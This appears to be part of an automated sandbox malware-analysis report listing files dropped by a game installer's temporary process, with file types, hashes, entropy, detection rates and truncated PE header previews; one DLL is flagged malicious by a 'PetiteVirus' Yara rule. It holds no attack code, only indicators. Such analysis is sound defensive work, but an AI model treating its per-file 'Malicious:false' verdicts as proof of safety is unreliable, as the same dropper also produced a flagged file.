                                                                        SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):562190
                                                                        Entropy (8bit):6.388293171196564
                                                                        Encrypted:false
                                                                        SSDEEP:12288:uCtwsqIfrUmUBrusLdVAjA1ATAtuQ8T2Q8TOksqHOuCHWoEuEc4XEmEVEEAcIHAj:uqiIoYmOuNNQ1zU/xGl
                                                                        MD5:713D04E7396D3A4EFF6BF8BA8B9CB2CD
                                                                        SHA1:D824F373C219B33988CFA3D4A53E7C2BFA096870
                                                                        SHA-256:00FB8E819FFDD2C246F0E6C8C3767A08E704812C6443C8D657DFB388AEB27CF9
                                                                        SHA-512:30311238EF1EE3B97DF92084323A54764D79DED62BFEB12757F4C14F709EB2DBDF6625C260FB47DA2D600E015750394AA914FC0CC40978BA494D860710F9DC40
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):258560
                                                                        Entropy (8bit):6.491223412910377
                                                                        Encrypted:false
                                                                        SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                        MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                        SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                        SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                        SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):16910
                                                                        Entropy (8bit):5.289608933932413
                                                                        Encrypted:false
                                                                        SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                        MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                        SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                        SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                        SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):17472
                                                                        Entropy (8bit):7.524548435291935
                                                                        Encrypted:false
                                                                        SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                        MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                        SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                        SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                        SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):214016
                                                                        Entropy (8bit):6.676457645865373
                                                                        Encrypted:false
                                                                        SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                        MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                        SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                        SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                        SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):126478
                                                                        Entropy (8bit):6.268811819718352
                                                                        Encrypted:false
                                                                        SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                        MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                        SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                        SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                        SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):315918
                                                                        Entropy (8bit):6.5736483262229735
                                                                        Encrypted:false
                                                                        SSDEEP:6144:zvhrZEi7+khFXxn+m0GJjExfTKqyNwEozbpT80kqD6jD1TlT5Tjalc:zvz17FhtBnLot8XD1T3ac
                                                                        MD5:201EA988661F3D1F9CA5D93DA83425E7
                                                                        SHA1:D0294DF7BA1F6CB0290E1EFEBB5B627A11C8B1F5
                                                                        SHA-256:4E4224B946A584B3D32BBABB8665B67D821BB8D15AB4C1CC4C39C71708298A39
                                                                        SHA-512:6E6FA44CE2E07177DEC6E62D0BEE5B5D3E23A243D9373FB8C6EEECEC6C6150CBD457ED8B8C84AB29133DFE954550CA972DEC504069CC411BD1193A24EA98AAEE
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):772608
                                                                        Entropy (8bit):6.546391052615969
                                                                        Encrypted:false
                                                                        SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                        MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                        SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                        SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                        SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):266254
                                                                        Entropy (8bit):6.343813822604148
                                                                        Encrypted:false
                                                                        SSDEEP:3072:F2JQNvPZGde1lxIrPYi/vNN0ZCS+lLLytmEwKuwKwvfNXOndQvmjmkVfte2t6l:FdlP8WUTY0hlL2KqfNamvmjFXe2g
                                                                        MD5:8B099FA7B51A8462683BD6FF5224A2DC
                                                                        SHA1:C3AA74FFF8BB1EC4034DA2D48F0D9E18E490EA3D
                                                                        SHA-256:438DE563DB40C8E0906665249ECF0BDD466092C9A309C910F5DE8599FB0B83D2
                                                                        SHA-512:9B81093F0853919BCE3883C94C2C0921A96A95604FD2C2A45B29801A9BA898BD04AA17290095994DB50CBFFCBBD6C54519851FF813C63CD9BA132AE9C6EFA572
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........J...................................................\....@... ......................P.......`..................................L............................u.......................c...............................text...t...........................`..`.data...............................@....rdata..(...........................@..@/4......t`.......b...r..............@..@.bss.....I...............................edata.......P......................@..@.idata.......`......................@....CRT....,...........................@....tls................................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):112640
                                                                        Entropy (8bit):6.540227486061059
                                                                        Encrypted:false
                                                                        SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                        MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                        SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                        SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                        SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):36416
                                                                        Entropy (8bit):7.842278356440954
                                                                        Encrypted:false
                                                                        SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                        MD5:BEBA64522AA8265751187E38D1FC0653
                                                                        SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                        SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                        SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):15374
                                                                        Entropy (8bit):5.192037544202194
                                                                        Encrypted:false
                                                                        SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                        MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                        SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                        SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                        SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):337408
                                                                        Entropy (8bit):6.515131904432587
                                                                        Encrypted:false
                                                                        SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                        MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                        SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                        SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                        SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):240654
                                                                        Entropy (8bit):6.518503846592995
                                                                        Encrypted:false
                                                                        SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                        MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                        SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                        SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                        SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):13838
                                                                        Entropy (8bit):5.173769974589746
                                                                        Encrypted:false
                                                                        SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                        MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                        SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                        SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                        SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):394752
                                                                        Entropy (8bit):6.662070316214798
                                                                        Encrypted:false
                                                                        SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                        MD5:A4123DE65270C91849FFEB8515A864C4
                                                                        SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                        SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                        SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......KL...-d..-d..-d..U...-d..Be..-d.TEe..-d..-e.:-d..Ba..-d..B`..-d..Bg..-d..B`.c-d..Bd..-d..B...-d..Bf..-d.Rich.-d.........................PE..L.....b`...........!.....L..........+S.......`...............................P............@.................................L........... .................... ..\ ..$...............................@...@............`...............................text...NK.......L.................. ..`.rdata......`.......P..............@..@.data...............................@....rsrc... ...........................@..@.reloc..\ ... ..."..................@..B................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):68042
                                                                        Entropy (8bit):6.090396152400884
                                                                        Encrypted:false
                                                                        SSDEEP:768:RX3HAdi7wgCsL6dVSngk2IFm3ZJVRDBLRROBBKRzPm3YRiF+ixh:NHQpe6SnZQLjICPm3Ytib
                                                                        MD5:5DDA5D34AC6AA5691031FD4241538C82
                                                                        SHA1:22788C2EBE5D50FF36345EA0CB16035FABAB8A6C
                                                                        SHA-256:DE1A9DD251E29718176F675455592BC1904086B9235A89E6263A3085DDDCBB63
                                                                        SHA-512:08385DE11A0943A6F05AC3F8F1E309E1799D28EA50BF1CA6CEB01E128C0CD7518A64E55E8B56A4B8EF9DB3ECD2DE33D39779DCA1FBF21DE735E489A09159A1FD
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...&...........................d......................................@... ..............................0..t....`..P....................p.......................................................1..H............................text...d...........................`..`.data...L...........................@....rdata..\...........................@..@/4.......2.......4..................@..@.bss.....................................edata..............................@..@.idata..t....0......................@....CRT....0....@......................@....tls.........P......................@....rsrc...P....`......................@....reloc.......p......................@..B........................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):852754
                                                                        Entropy (8bit):6.503318968423685
                                                                        Encrypted:false
                                                                        SSDEEP:12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
                                                                        MD5:07FB6D31F37FB1B4164BEF301306C288
                                                                        SHA1:4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
                                                                        SHA-256:06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
                                                                        SHA-512:CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):39304
                                                                        Entropy (8bit):7.819409739152795
                                                                        Encrypted:false
                                                                        SSDEEP:768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
                                                                        MD5:C7A50ACE28DDE05B897E000FA398BBCE
                                                                        SHA1:33DA507B06614F890D8C8239E71D3D1372E61DAA
                                                                        SHA-256:F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
                                                                        SHA-512:4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):8456
                                                                        Entropy (8bit):6.767152008521429
                                                                        Encrypted:false
                                                                        SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                        MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                        SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                        SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                        SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-KVRT3.tmp, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):18966
                                                                        Entropy (8bit):7.620111275837424
                                                                        Encrypted:false
                                                                        SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                        MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                        SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                        SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                        SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-L2U9S.tmp, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):648384
                                                                        Entropy (8bit):6.666474522542094
                                                                        Encrypted:false
                                                                        SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
                                                                        MD5:CE7DE939D74321A7D0E9BDF534B89AB9
                                                                        SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
                                                                        SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
                                                                        SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:Unicode text, UTF-8 text
                                                                        Category:dropped
                                                                        Size (bytes):1059
                                                                        Entropy (8bit):5.1208137218866945
                                                                        Encrypted:false
                                                                        SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                        MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                        SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                        SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
